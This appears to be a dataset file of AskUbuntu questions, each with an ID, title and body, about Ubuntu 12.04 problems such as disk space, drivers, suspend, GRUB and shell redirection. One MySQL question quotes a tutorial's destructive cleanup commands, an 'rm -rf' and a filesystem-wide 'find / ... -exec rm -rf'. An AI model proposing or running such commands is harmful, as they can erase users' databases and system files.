172880	authetication failed	after reinstalling ubuntu one using the faqs tutorial , when i try to log in , ubuntu gives me the message : `` the authentication failed '' . i tried to recover the password ( even knowing it ) , clicking on the button `` i 've forgotten my password '' , but when i entered my mail address , ubuntu tells me `` sorry , we did not recognize the email address '' . i can sign in without problem using the browser . i am using 12.04 32-bit . any ideas ?
172885	full disk problem though it is not	disk full problem , but it is not in 12.04 have tried to delete all trash contents permanent a lot of other things , but still full . if looking into system monitor sometimes it looks like i 've got 1gb free but system `` eats '' it up in a few minutes . morgan @ hp-pavilion3 : ~ $ df -h /home filsystem storlek använt ledigt anv % monterat på /dev/sdb1 224g 223g 0 100 % / morgan @ hp-pavilion3 : ~ $ df -i /home filsystem inoder ianvänt ilediga ianv % monterat på /dev/sdb1 14671872 455212 14216660 4 % / morgan @ hp-pavilion3 : ~ $ df -i filsystem inoder ianvänt ilediga ianv % monterat på /dev/sdb1 14671872 455212 14216660 4 % / udev 211413 668 210745 1 % /dev tmpfs 215042 613 214429 1 % /run none 215042 3 215039 1 % /run/lock none 215042 6 215036 1 % /run/shm overflow 215042 46 214996 1 % /tmp
172887	how to develop broadband router with ubuntu ?	i wanted to develop a router from scratch in ubuntu which will manage following things . user bandwidth management . user browsing history and bandwidth tracking . assign hotspot , pppoe type of the connection . set various firewall rules . can you please guide me how can i do above things with ubuntu ? i want to convert ubuntu server as a nas for broadband management and bill solutions . any help will be appreciated .
172890	gnome shell messes up file selection and chrome system title bar	everything went alright up until a couple of days ago when i connected my asus u36sd laptop running 12.04 with gnome shell to a projector . in certain cases , currently only affecting a maximized chrome window and mouse file selection , the regular system title bar and colors get changed to plain white . this does not , however , affect any other browser or window . to make it easier to understand , i attached three screenshots picturing the isssue . do you have any idea what could be causing this ? there were no upgrades , installs or tweaks done in the past week , so i 'm completely in the blue . unmaximized chrome window using system title bars . everything looks alright maximized chrome window ( same settings ) . system title bar turns blank file selection . what should 've been a transparent blue-ish area turns white . selecting individual files still works properly
172898	ubuntu wo n't suspend automatically any more	in the last month or so , ubuntu ( 12.04 ) has stopped sleeping automatically . i 've gone to system settings > power , and verified ( and toggled ) `` suspend on inactive for '' to 5 minutes ( for both battery and `` when plugged in '' ) , but the system stays awake . i 've also tried used code similar to $ gsettings set org.gnome.settings-daemon.plugins.power sleep-inactive-ac-timeout 300 $ gsettings set org.gnome.settings-daemon.plugins.power sleep-inactive-battery-timeout 300 to set the timeout values . i 've also verified these in dconf editor . previously , i could set this quite low to make my computer sleep quickly , but now it no longer works either . i 'm not sure if this is relevant , but under old versions of ubuntu , if i wanted my computer to never suspend ( via the cli ) , i would also have to set $ gsettings set org.gnome.settings-daemon.plugins.power sleep-inactive-ac false at some point , this seemed to have been depreciated ( and also gave me the error `` no such key 'sleep-inactive-ac ' '' ) . i found that it it was enough to set sleep-inactive-ac-timeout to 0 . this worked for a while , but at some point auto-suspend stopped working as stated above . oddly enough , the sleep-inactive-ac key is still present when i look via dconf editor . however , when i click it , it says `` no schema '' , and the summary , etc . fields are blank . to test if the dconf power plugin was working , i tried playing around with other settings in the schema . idle-dim-time and idle-dim-ac work as expected . however , setting sleep-display-ac to 5 seconds has no effect . i 'm also not sure if this is relevant , but i 've uninstalled gnome-screensaver , and installed xscreensaver . i have tried killing xscreensaver and re-installing gnome-screensaver , but this did not help . i 've also had some trouble with dpms . i 'm not sure if this is related , but i 'll put the information here , just in case . using xscreensaver , i set power management to enabled , with standby and suspend timeouts to 10 minutes . i 've verified these settings in ~/.xscreensaver and xset q . however , the screen blanks after about 30 seconds . if i turn off dpms ( either via xscreensaver gui or modifying ~/.xscreensaver ) , it wo n't blank at all , so i know that dpms is partially reading the xscreensaver settings . -- edit i 've attempted more troubleshooting , by creating a new user account , then logging out of the main account and into the new account . i 've tried modifying the timeouts via dconf , but get the same results as above ( i.e . it does n't work , nor does sleep-display-ac , but idle-dim-time and idle-dim-ac work ) . also , the depreciated sleep-display-ac key is not visible , so i think that this is probably unrelated . -- edit i 've since moved to gnome-shell instead of unity , and still have this problem , so i guess that it 's something to do with gnome-power-manager .
172902	problems updating weather indicator	i can not update weather indicator with update manager . this is the terminal log : installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` sr_rs.utf_8_latin '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = '' sr_rs.utf_8_latin '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = '' sr_rs.utf_8_latin '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = '' sr_rs.utf_8_latin '' are supported and installed on your system . perl : warning : falling back to the andard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory setting up indicator-weather ( 11.11.28-0ubuntu1.1 ) ... installing indicator-specific icons ... installing indicator dconf schema ... cp : can not stat `/usr/share/indicator-weather/indicator-weather.gschema.xml ' : no such file or directory dpkg : error processing indicator-weather ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : indicator-weather error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) setting up indicator-weather ( 11.11.28-0ubuntu1.1 ) ... installing indicator-specific icons ... installing indicator dconf schema ... cp : can not stat `**/usr/share/indicator-weather/indicator-weather.gschema.xml** ' : no such file or directory dpkg : error processing indicator-weather ( -- configure ) : subprocess installed post-installation script returned error exit status 1 the file that i bold really does not exist . how can i solve this problem ?
172905	updating repo issue must be changed in ubuntu	what do you all think about the 11 to 14 mbs of data during updating the repository index files ( with sudo apt-get updates ) of the installed ubuntu or other linux os to just get a piece of software for the system ? whatever you all guys think it is very bad thing about ubuntu and other linux os 's . many people hate this thing ( updating ) their system due to the reason of slow bandwidth . so i think it will better for ubuntu and other linux os 's to improve it as soon as possible . i suggest idea of developing any script by which people can only update for particular repository instead of whole one . thanks and please tell me if it only happening with my system .
172909	adding custom wallpapers to 'wallpaper ' section ?	here is what i am doing : right-click on desktop > select `` change desktop background '' > under the `` look '' tab select `` wallpapers '' from the drop-down menu > click on the `` + '' button to add new wallpapers to the selection > browse to the wallpaper and click `` open '' ... what happens then is that the `` wallpapers '' section changes to the `` pictures folder '' section with the wallpaper being applied to the desktop background - however when i close the appearance dialog and reopen it and go again to `` pictures folder '' my wallpaper is no longer there ! ! so ... the wallpaper should be added to the `` wallpapers '' section and not to the `` pictures folder '' ... . and the custom wallpaper should not disappear -- ever ! and , yes , this is a clean install not an upgrade ... and yes it 's occurring on other ubuntu 12.04 machines as well - all of the 3 i have here .
172914	remote access from an ubuntu desktop on internal lan over internet to ubuntu machine on another lan	this question is prompted by another question here . now i use teamviewer to connect to a ubuntu desktop in a customer 's lan from my lan . i get a password and access id from him and connect , then use it to login to other ubuntu servers/machines using ssh or whatever commands/packages i need . i am looking for an open source alternatives where i can do nat pass through on both ends ( my router and customers router ) . if this can be accomplished by free-nx , remmina or vnc , can some one point to documentation on how to set this up ? note : port-forwarding from router at customer 's router is not an option , so such solutions can not be used .
172917	thinkpad t420s wo n't boot in nvs 4200m enabled	i have ubuntu 12.04 installed on my lenovo thinkpad t420s . in bios i have an option to select graphical card : integrated intel card or nvs 4200m ( or nvidia optimus which is out of scope now ) . when i select integrated intel card in bios everything works fine . when i select nvidia system freezes after grub screen . sometimes i get weird `` ata revalidation failed '' . magic button ( alt+fn+sysrq+e/i/s/u/b ) does n't work . what i have tried : installing recent nvidia-current from x-swat ppa . purging nvidia-current and nvidia-common updating t420s bios version . updating kernel to 3.4.7 . booting old kernel 3.2.0-18 . nothing helps . i do n't think this is hardware issue since windows works fine . any ideas ?
172919	partition does n't listed in /dev/	i got this message in gparted when seeing information about a partition that is marked with the yellow warning icon in the partition list : e2label : no such file or directory while trying to open /dev/sda6 could n't find valid filesystem superblock . could n't find valid filesystem superblock . dumpe2fs 1.42 ( 29-nov-2011 ) dumpe2fs : no such file or directory while trying to open / dev/sda6 unable to read the contents of this file system ! because of this some operations may be unavailable . the cause might be a missing software package . the following list of software packages is required for ext4 file system support : e2fsprogs v1.41+ . i 've checked that e2fsprogs is already the newest version . this is the result of ls /dev/sda* : /dev/sda /dev/sda2 /dev/sda5 /dev/sda7 there 's no /dev/sda6 , but this is the result of sudo fdisk -l : disk /dev/sda : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders , total 234441648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x48350995 device boot start end blocks id system /dev/sda2 61239296 125128703 31944704 83 linux /dev/sda3 125130751 234441628 54655439 f w95 ext 'd ( lba ) /dev/sda4 52854784 61239295 4192256 7 hpfs/ntfs/exfat /dev/sda5 125130752 204957263 39913256 83 linux /dev/sda6 204957333 232315956 13679312 83 linux /dev/sda7 232315965 234441628 1062832 82 linux swap / solaris partition table entries are not in disk order how to address this problem ? please tell me if my information is not enough . i do n't know exactly what information is related to or needed to solve this problem . leak of knowledge about this problem also makes me difficult to google it . update it seems this problem appeared after i tried to make 2 new ntfs partitions when another partition is in use ( i.e . current ubuntu partition ) . i reproduced the scenario and got this message when creating one of them : gparted 0.11.0 -- enable-libparted-dmraid libparted 2.3 format /dev/sda4 as ntfs 00:00:02 ( error ) calibrate /dev/sda4 00:00:00 ( success ) path : /dev/sda4 start : 52,854,784 end : 61,239,295 size : 8,384,512 ( 4.00 gib ) set partition type on /dev/sda4 00:00:02 ( error ) libparted messages ( info ) error informing the kernel about modifications to partition /dev/sda3 -- device or resource busy . this means linux wo n't know about any changes you made to /dev/sda3 until you reboot -- so you should n't mount it or use it in any way before rebooting . failed to add partition 3 ( device or resource busy ) i 've rebooted , but there was no change .
172920	how to reinstall mysql without damaging data ?	http : //stuffthatspins.com/2011/01/08/ubuntu-10-x-completely-remove-and-clean-mysql-installation/ shows how to reinstall everything . i want to do something like this without reinstalling data . obviously i ca n't execute this : delete preferences ( the next find command will delete everything ) : rm -rf /etc/mysql find all files with “mysql” on / and delete them : find / -iname ‘mysql*’ -exec rm -rf { } \ ; then i run sudo aptitude purge mysql-server sudo aptitude install mysql-server but then i run into problem because i ca n't access some mysql-bin.0000x is not writeable or something . if i keep mysql-bin.index empty or deleted it i got complaint that files are empty or inaccessible . i think the issue is that mysql does n't have permission to access those file . however , i ca n't give them permission because the installation is supposedly automatic . so what should i do ? this is for amazon-ec2
172927	do all linux distros use the same kernel ?	by `` the same kernel '' , i mean the one which was originally created by torvalds and then updated by people here : http : //www.kernel.org is it true that different distros all keep the kernel unchanged ( of course they will update the kernel when there is a new version from the above site ) , and only make changes to the various utilities of their own ?
172930	resize a 2tb partition on a 3tb disk created with fdisk	i recently added a new 3tb hard drive to a headless media server ( hp proliant microserver ) running ubuntu server 12.04 . i followed this tutorial , which uses fdisk to create a single partition of the maximum size reported by fdisk . i have choosen ext4 format . i then copied across all my media , which took some time . i am guessing that fidisk has a 2tb limit , because du is reporting this as the size . is there any way to increase the size of the partition to 3tb without having to copy all my media over again ?
172937	how to make subdomains point to different local ip addresses ?	i have a domain name mydomain.com which points to a static ip address . i have configured in my modem so that all request to port 80 of this static ip will come to my local computer 192.168.1.100 ( web server ) . now i want to have 2 sub-domain point to 2 another local ip : sub1.mydomain.com -- - > 192.168.1.101 ( host another web server ) sub2.mydomain.com -- - > 192.168.1.102 ( host redmine server ) is this possible ? if yes , please show me how ? i use ubuntu server 12 .
172940	ubuntu 12.04 dual monitor	i have just installed ubuntu 12.04 with 3 monitors . one monitor shows up but the other 2 do not . my card is 2 gtx480 nvidia in sli mode . i have tried to run sudo nvidia-settings but nothing shows up . any thoughts would be welcome
172941	sound converter fails to convert mp3 to m4a	it shows me an error ( shown below ) when i try to convert from mp3 to gnome audio file ( .m4a ) any tips on how i can fix this ? urgent help will be much appreciated .
172945	main difference between ubuntu and redhat ?	except package management and environments , i would like to know what 's the main points between them . which are providing best support to their builds ?
172947	what are the differences between `` md5sum '' and `` sha256sum '' ?	why we need two tools for verifying iso . is there any specific things to consider between them ?
172960	how to change resolution to a higher value ?	i have a 1400x900 monitor and the maximum resolution the monitor can reach in ubuntu is about 1024x800 . however , in windows 7 64-bit , the monitor can reach the maximum resolution possible . specs of my computer : nvidia geforce gt 240 4 gb ram intel pentium dual-core
172962	black screen after installing recommended nvidia drivers . what to do ?	new to ubuntu . problem description : until recently i had windows on my computer . my hard disk is divided into two partitions . on the first one ( app . 10 gb ) i had my windows xp on the second one ( app . 30 gb ) i have some data i tried to install ubuntu 12.04 on the first partition ( the smaller one ) . since i wanted to keep the data on my second partition , i chose the third install option . during the installation process i deleted the data on partition one , created a new partition with the same size , formatted it as ext4 and mounted / on it . the installation continued fine and at the end i restarted and took the cd out when it ejected automatically ( it could have been also before the restart ) . ubuntu started but i noticed that my computer was slow . then a prompt appeared telling me that i did not have the optimal nvidia drivers and recommended to install a specific one . i clicked on the recommended driver , installation went apparently just fine and at the end i had to restart the system again . i did it , ubuntu started , asked for my password , i typed it , pressed enter , the screen turned black and remained like that ( only the cursor was there and i could move it ) . i restarted and the same thing happened again . has anyone had such a problem before and was able to solve it ? with windows i always installed drivers from cds after installing windows . are the same cds going to work for ubuntu too or i should find special drivers ? p.s . during the installation i was connected to the internet and i agreed on installing updates and the third party software . in the time before i installed that problematic but recommended nvidia driver i checked that there was between 6 and 7 gb free space on the first partition where i installed ubuntu .
172965	webapp integration in firefox doesnt show	in firefox the webapp integration doesnt show . in chrome it does . i also have no unity tab in my firefox preferences .
172966	i do n't see the unity section in firefox preferences	i found in another question on askubuntu someone had demonstrated on how to enable/disable sites that would integrate with unity , in the webapps preview . there was a screenshot showing a `` unity '' section in the firefox preferences . i do n't have that option . this is the screenshot : how can i get this option ? is there any package i need ? this is the original question containing the screenshot : how to manage `` unity webapps chromium extension '' different options ?
172968	how to uninstall gwibber ?	i am new to linux and i started using gwibber but i wan na uninstall it from my ubuntu . what shall i do ? ? quick help needed . my facebook is always online right now . i dont even know how to log out of facebook in gwibber . please help..
172970	how to define multiple xorg screens using the same device ?	i have a video-adapter ( dell mmh11 ) that is connected to the display-port of my graphics card . the adapter identifies itself to the graphics card as a 3840x1200 display . the adapter has two monitors connected to it ( monitor resolution=1920x1200 ) . a third monitor is connected directly on the graphics card dvi port ( same resolution ) . so i have 3 monitors , but xorg only recognizes 2 `` monitors '' { adapter ( 3840*1200 ) , samsung ( 1920x1200 ) } . i have these two `` monitors '' configured in xorg.conf with the nvidia driver and using xanorama . the window manager ( kde in my case ) runs just fine . however , the it recognizes just two screens , which breaks stuff like full-screen functionality ( now it 's not full-screen but two-full-screen ) . also , window snapping is 'wrong ' and the menu is crossing the two screens . does x11/xorg.conf provide a way to 'split ' a monitor+device into two screens ? so is it possible to create two screen sections that are using the same device ( the mmh11 adapter ) . i assume that kde will get will get the displays right that way . ( just like it picks up the borders/size for the adapter and the direct monitor at this time , from the current screen sections . )
172972	configure mouse speed ( not pointer acceleration ! )	is there way to increase the mouse speed in kde4 ? i do n't want any pointer acceleration , it 's just the mouse speed that i want to change . edit : unfortunately , editing the xorg.conf is not an option for me , because i want the users to be able to configure the mouse speed themselves and it is company policy do deny users permission to change the xorg.conf .
172973	ca n't access certain websites in 12.04	i am using 12.04 . it was absolutely fine two days ago . but now all my excitement is turned into frustration . i ca n't open facebook , yahoo , hotmail and many other websites although many other websites just work fine and even i do n't have any problem in downloading . i looked up various solution provided on this forum but neither workout for me . please help me or i have to uninstall this os . my gmail account opens easily.so idont think its a https issue
172979	dialog boxes are not centred in the screen	i have two laptops running 12.04 and seem to have the same problem in both . when i open a dialog box , such as `` file open '' , the save button is off the side of my screen ( see screen shot below ) . this problem seems to occur with all applications .
172982	what is the difference between `` redirection '' and `` pipe '' ?	this question may sound a bit stupid , but i can not really see the difference between redirection and pipes . redirection is used to redirect the stdout/stdin/stderr , e.g . ls > log.txt . pipes are used to give the output of a command as input to another command , e.g . ls | grep file.txt . but why are there two operators for the same thing ? why not just write ls > grep to pass the output through , is n't this just a kind of redirection also ? what i am missing ?
172983	interrupting apt-get dist-upgrade : what could happen ?	let 's suppose i ssh into my computer and run sudo apt-get dist-upgrade and , while apt-get is running and installing the packages , another person who is sitting at the terminal and logged into gnome decides to shut-down the computer via the gui . what is the worst that can happen under this circumstance ? are there any mechanism that prevents the packages from being left in a 'dirty ' state ? if not , how to prevent that ?
172992	unable to find cd-rom when installing office 2010 wih playonlinux	playonlinux does not find the virtual cd-rom it creates . if i chose /media/cdrom , or office14 , or even /media , playonlinux continues to display the error `` can not find cdrom '' . it has no idea where it is mounted . please help .
172993	how to remove grub2 ?	i have a dual-boot windows 7 and ubuntu with a custom boot-loader ( long story ) . my problem is that when i boot up , i get the choices for windows and ubuntu in my custom boot-loader , and if i choose ubuntu , i then get grub , with a working linux entry and a bunch of other entries that do n't really make sense . so basically what i am trying to do is completely remove grub , and just use my custom boot-loader . is that possible ?
172996	how do i make a minimal ubuntu installation ?	i need a system that has only basic system commands , the minimum required drivers ( network , screen , etc ... ) , apt and python ! it 's for a project for a robot .
173003	aliased hud icon ?	i am currently on ubuntu 12.04 with unity 3d and today i noticed that the icon next to the hud is slightly artefacted and aliased , unlike the other icons in the dash . i was wondering if i 'm the only one affected by this and if not , is it a know bug or should a report be made ? my graphics card : intel hd 3000 + nvidia gtx425 . unity runs on the integrated one . ps : this seems to appear only in autohide mode , not in always on .
173011	who created files in `` /proc '' with my username ?	i just learned about file security , user & group , etc . and i appreciate a lot about the elegance of the filesystem of linux . my username is lyg , and i found there are some files with owner lyg in /proc/ , as shown below : lyg @ lyg-virtualbox : ~ $ ll /proc/|grep lyg dr-xr-xr-x 8 root lyg 0 aug 7 09:11 1119/ dr-xr-xr-x 8 lyg lyg 0 aug 7 09:47 1298/ dr-xr-xr-x 8 lyg lyg 0 aug 7 22:05 7097/ dr-xr-xr-x 8 lyg lyg 0 aug 7 22:05 7098/ then i found that this could not happen normally , these files can not be created by me manually , since i had no permissions requiered , see : lyg @ lyg-virtualbox : ~ $ ls -ld /proc/ dr-xr-xr-x 108 root root 0 aug 7 09:10 /proc/ and here was my processes information , from which i knew that /proc/1298/ was related to -bash process : lyg @ lyg-virtualbox : ~ $ ps -ef|grep lyg avahi 452 1 0 09:11 ? 00:00:00 avahi-daemon : running [ lyg-virtualbox.local ] lyg 1298 1119 0 09:11 tty1 00:00:22 -bash lyg 7099 1298 0 22:05 tty1 00:00:00 ps -ef lyg 7100 1298 0 22:05 tty1 00:00:00 grep -- color=auto lyg so , how are these files in /proc/ created ?
173012	how do i upgrade mysql 5.5.24 to 5.5.27 on ubuntu 12.04 ?	i 've bee running around for about 1 1/2 hours now trying to figure out how to do an upgrade . can anyone direct me to a tutorial on this ?
173018	how can i disable one graphics card/gpu on my system ? ( interchangeable graphics involved )	the problem i have is this : i have a dell laptop with 2 gpus , an intel integrated and high performance of amd radeon hd a 6470m , but ubuntu does not detect it . however , the two are active at the same time , which causes the equipment to overheat , and the to battery last less than 40 minutes . i installed the catalyst drivers but the system becomes unstable and heated even more . please help me to solve this problem either by using the appropriate software , or by disabling either gpu in ubuntu , as it is not possible to do so in the bios . system specs : intel core i5 cpu ( with integrated gpu ) intel hd 3000 1.5gb integrated graphics amd radeon hd 6470m 512mb . 4gb ram
173021	virtualization solution with decent graphical capabilities ?	i 've been using virtualbox for a really , really long time and enjoyed it but now i need to run unity3d ( dev tool , not the ubuntu shell ) and this seemingly simple task turned out to be too much for humble graphical abilities of virtualbox . the thing is virtual box allows only up to 128mb of video memory ( i 've tried various tricks described over internet to make it work with 256mb but with no luck ) which is not enough for even ide of unity3d to start ( it kind of starts but only kind of ) . also with direct3d support enabled virtual box crashes when i try to do something in unity and without it unity3d ide looks completely unusable . i guess i need virtualization solution which capable of utilizing more video resources of my notebook hardware . i have 8 gbs of ram , radeon 5730 video card and also integrated intel card : 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 12 ) ( prog-if 00 [ vga controller ] ) subsystem : micro-star international co. , ltd. device 1037 flags : bus master , fast devsel , latency 0 , irq 43 memory at f0000000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at e080 [ size=8 ] expansion rom at < unassigned > [ disabled ] capabilities : [ 90 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ d0 ] power management version 2 capabilities : [ a4 ] pci advanced features kernel driver in use : i915 kernel modules : i915 i 've tried to run unity3d in virtual box using both intel card and radeon with indistinguishable results . also , i 've got error while installing vmware-player : 2012-08-07t19:08:59.923+04:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-27-generic . 2012-08-07t19:08:59.923+04:00| vthread-3| i120 : validating path /lib/modules/3.2.0-27-generic/build/include for kernel release 3.2.0-27-generic 2012-08-07t19:08:59.927+04:00| vthread-3| i120 : your gcc version : 4.6 2012-08-07t19:08:59.938+04:00| vthread-3| i120 : your gcc version : 4.6 2012-08-07t19:08:59.973+04:00| vthread-3| i120 : header path /lib/modules/3.2.0-27-generic/build/include for kernel release 3.2.0-27-generic is valid . 2012-08-07t19:08:59.973+04:00| vthread-3| i120 : building module vmnet . 2012-08-07t19:08:59.973+04:00| vthread-3| i120 : extracting the sources of the vmnet module . 2012-08-07t19:08:59.986+04:00| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vmnet-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-27-generic/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-08-07t19:09:02.872+04:00| vthread-3| i120 : failed to compile module vmnet !
173023	why all gnome extensions showing outdated ?	i have installed gnome 3 on ubuntu today following this guide . all worked well and i have installed the extensions mentioned without problem . however , after logging out and in , all extensions were gone . going to the gnome extensions website , i saw that all my extensions were outdated and that i could install only one other extension . i 'm rather new to ubuntu and completely new to gnome . i do n't even know how to check my own version ( there 's no mention of gnome in system information ) - i reasoned maybe i 'm using an outdated version , even though apt-get update/upgrade/dist-upgrade does not upgrade anything or solves the problem . how do i get things back working ? i 've uninstalled all my extensions , but that did n't do the trick , either . update : i tried to install the one extension the gnome website shows as valid , but nothing happens ; same when trying to install 'outdated ' extensions . i see the popup , choose install , nothing happens .
173024	how do i make a proxy server ?	how do i make a proxy server that allows other computers to access my internet connection through the proxy , but will not allow them to access my internet connection directly ? i have a server and a switch . i would also like to provide wifi access under the same conditions .
173025	where can i find a complete list of the ranking of the ubuntu app showdown 's applications ?	my application participated at the ubuntu app showdown contest and i wanted to know its ranking . where can i see it ? also , will there be a ranking for every separate criterion of every separate application ?
173032	slow wifi download speed with a tp link tl-wn722n	i have pc ( with ubuntu 12.04 ) connected to lan with 100 mbps internet speed . i created wifi hotspot on my pc with wireless usb adapter tp link tl-wn722n , which allows up to 150 mbps speed . with my asus transformer pad ( tablet ) i manage to connect to this wifi hotspot and it says i have excellent , 54 mbps speed . but when i test actual speed i get 0,8 mbps download speed and 10 mbps upload speed . why is my download speed so low ? update : i tried internet connection in windows ( i have dual boot ) - i get download speed 30 mbps and upload speed 18 mbps ... so it 's obviously ubuntu that 's causing slower speeds ( both ) ...
173035	redirection execution order ?	i wonder why the standard errors are always output first despite the redirection order in my commands : '' first > then 2 > & 1 '' lyg @ lyg-virtualbox : ~ $ > txt lyg @ lyg-virtualbox : ~ $ ls txt tt ttt > txt 2 > & 1 lyg @ lyg-virtualbox : ~ $ cat txt ls : can not access tt : no such file or directory ls : can not access ttt : no such file or directory txt '' first 2 > then 1 > & 2 '' lyg @ lyg-virtualbox : ~ $ ls txt tt ttt 2 > txt 1 > & 2 lyg @ lyg-virtualbox : ~ $ cat txt ls : can not access tt : no such file or directory ls : can not access ttt : no such file or directory txt what is the detailed procedure of redirection for each ?
173044	dell dimension 4600i wo n't awaken from suspend	dell dimension 4600i with 1gb ram . installed ubuntu 12.04 without difficulty . if left unattended , it appropriately goes to sleep and i can awaken it with a mouse gesture or keyboard press . however , if i use the suspend command it sleeps and then will not awaken , forcing a hard reboot . pretty new install . not many modifications from the stock distribution . i am new to linux and would appreciate any direction someone can give . thanks .
173046	flash video fails to go full screen	i have tried the fixes in full screen flash problems and video 's wo n't go into full screen and none of this solved my problem . in youtube , if i click quickly on the `` full screen '' button many times , eventually it will `` stick '' and stay in full screen . but i am watching a different flash video player ( url : http : //www.ewtn.com/live/unicorn/jwplayer.asp ? feed=domeng ) and no matter how many times i click , it wo n't stay in full screen - it flashes briefly and then collapses back to a window . ubuntu 12.04 ; desktop unity ; browser chrome 18.0.1025.168 ( developer build 134367 linux ) ; flash - `` version : 11.2 r202 '' npapi .
173047	12.04 audio skipping occasionally	i 'm having a problem with skipping audio on two different machines , both with up-to-date ubuntu 12.04 desktop installed ( one 32 bit , the other 64 ) it does n't happen all the time ( maybe once per song when it gets bad ) , and happens regardless of the program creating the audio ( could be streaming through grooveshark , or playing files with vlc , etc . ) does anyone have any ideas as to why this is happening , or how i could fix it ? i do n't really even know where to start . thanks !
173048	managing grub in case of 2 linux installations	i installed ubuntu 12.04 . my default windows bootloader is taken over by ubuntu . after this , i installed fedora 16 and then my bootloader was taken over by fedora . so , now i see fedora grub menu when i start my laptop . is there any way that i can get back the ubuntu 12.04 grub menu without messing up anything ?
173049	how do i install ubuntu in command-line mode from the live cd ?	i 'm having 12.04 live cd . i want to install ubuntu only with cli mode . i do n't want to do like installing gui and then setting it to boot to terminal . the purpose behind this question is i want to install many ubuntus virtually for specific purpose each one , in my pc and i have low size of space . thank you .
173061	scx 3201g duplex ( long edge and short edge )	i am unable to set it to two-sided ( long edge and short edge ) . as soon as i click `` apply '' or `` ok '' , it changes back to one sided . my printer support this function under windows . lsusb bus 002 device 010 : id 04e8:3441 samsung electronics co. , ltd
173062	will not shut down	my dell inspiron 1720 laptop with 12.04 with latest updates will not shut down when commanded off . after each upgrade it will probably turn off once , the next time it is commanded off , it will shut down to the numlock , power and bluetooth lights . holding power switch for 5 seconds completes the turnoff . tried the terminal command sudo shutdown -h now with no different result . changing the video driver from nvidia accelerated graphics driver ( post-release updates ) ( version 173-updates ) to nvidia accelerated graphics driver ( post-release updates ) ( version current-updates ) also gave me a single command shutdown but no more .
173063	manually add files to tar	i have a ton of txt.gz files on a network i want to ungzip and put into a tgz . i have enough disk space for the all compressed files , but not uncompressed . the way i see it in my head is tar -czf output.tgz -- daemon while read filename do wget ftp : //server/path/ $ filename.gz gunzip $ filename.gz tar -- add-to-daemon ./ $ filename rm $ filename done tar -- close-daemon is there a way to do this ?
173068	how to install windows live essential mail	how do i install windows live essential mail on ubuntu ? i want this because thunderbird and other clients fetch email every 5 mins , not instantly . thanks .
173069	c program runs well in windows but when run on ubuntu it is not asking for string ?	my simple code for getting info from user & print the same works fine with windows os ( on dev c++ ) but but its not asking for string when run on ubuntu ( tried terminal/dev c++ via wine/code blocks ) # include < stdio.h > void display ( ) ; struct book { int isbn ; char name [ 25 ] ; } b [ 5 ] ; void push ( ) { int top ; for ( top=0 ; top < 5 ; top++ ) { printf ( `` enter the isbn no : '' ) ; scanf ( `` % d '' , & ( b [ top ] .isbn ) ) ; printf ( `` enter the name : '' ) ; fflush ( stdin ) ; gets ( b [ top ] .name ) ; } } main ( ) { push ( ) ; display ( ) ; } void display ( ) { int i ; for ( i=0 ; i < 5 ; i++ ) { printf ( `` -- -- -- -- -- -- -- -- \nisbn no : % d '' , ( b [ i ] .isbn ) ) ; printf ( `` \nbook name : % s \n '' , ( b [ i ] .name ) ) ; } printf ( `` -- -- -- -- -- -- -- -- \n '' ) ; } void pop ( ) { int i ; for ( i=0 ; i < 5 ; i++ ) { printf ( `` -- -- -- -- -- -- -- -- \nisbn no : % d '' , ( b [ i ] .isbn ) ) ; printf ( `` \nbook name : % s \n '' , ( b [ i ] .name ) ) ; } printf ( `` -- -- -- -- -- -- -- -- \n '' ) ; } output on ubuntu : enter the isbn no:23 enter the name : enter the isbn no : after i input 23 it has to ask for the name of the book but its skipping that part & again asks for next isbn no . after some blind retries i found that when gets ( b [ top ] .name ) ; gets ( b [ top ] .name ) ; was used twice like this it worked fine ... . my question is why is it so. ? how to make ubuntu compile & run programs that run fine on windows ?
173071	why does disk utility show 8 bad sectors on a 2-months old harddrive ?	i have recently changed my harddrive and disk utility already gives me this message that i have 8 bad sectors and that it is sign of imminent disc failure . it counts 8 bad sectors and i really dont know what has caused it . i have 4 partitions on it that work perfectly and i do use this harddisk to copy and move loads of data ( music , movies , photos ) . can anyone tell me how i could fix it or prevent the disc failure ? by the way , these bad sectors are shown as a problem in the `` reallocated sector count '' section .
173073	not able to copy files to usb	recently i am encountering a problem while copying files to pen drives . the copying as it reaches the end it stalls and continues for a long time . the problem occurs at the end of copying . can anybody propose any solution for this . i am using ubuntu 12.04
